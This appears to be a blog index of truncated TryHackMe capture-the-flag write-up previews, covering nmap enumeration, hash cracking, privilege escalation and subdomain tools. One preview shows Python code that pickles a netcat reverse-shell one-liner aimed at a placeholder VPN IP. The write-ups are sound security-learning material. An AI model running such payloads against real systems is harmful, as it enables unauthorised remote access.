Posts
tw00t
Cancel

Agent Sudo from TryHackMe Task 1 - Author note nice Task 2 - Enumerate starting with a nmap scan, we get the good ol’ nmap scan How many open ports? 3 - 21, 22 and 80 So, w...

import pickle import sys import base64 command = ‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f /bin/sh -i 2>&1 netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f’ cl...

Crack the Hash from TryHackMe store the hash of each question in a text file using echo -n '<hash>' > <hash_file> (use quotes because some hashes contain $ which messes up the data ...

Simple CTF from TryHackMe running our usual nmap scan, we get we see that ftp is running at port 21 with anonymous ftp enabled a web server is running at port 80 with default ...

Basic Pentesting from TryHackMe Task 1 - Web App Testing and Privilege Escalation Deploy the machine and connect to our network Find the services exposed by the machine ...

Pickle Rick from TryHackMe the description says that there is a web server up and running, so we go to the IP so we have to ssh into the system and get the ingredients the source code of the p...

Linux PrivEsc Task 1 - Deploy the Vulnerable Debian VM Deploy the machine and login to the “user” account using SSH. yea, ssh user@MACHINE_IP, then password = password321 R...

Shodan.io bro, i’m so stupid :cry:, how do i get past this memory. i did a mv linuxprivesc.md shodan.md instead of transferring to another directory as mv linuxprivesc.md shodan.md folder_to_move_...

Web Scanning from TryHackMe Task 1 - Pull the lever, Kronk! ah, a The Emperor’s reference Task 2 - …I’m supposed to scan with that? should i keep mentioning about how you should be running <...

Sublist3r from TryHackMe Task 1 - Intro so cool, a subdomain finder Task 2 - Installation just basic setup Task 3 - Switchboard What switch can we use to set our target domain to perf...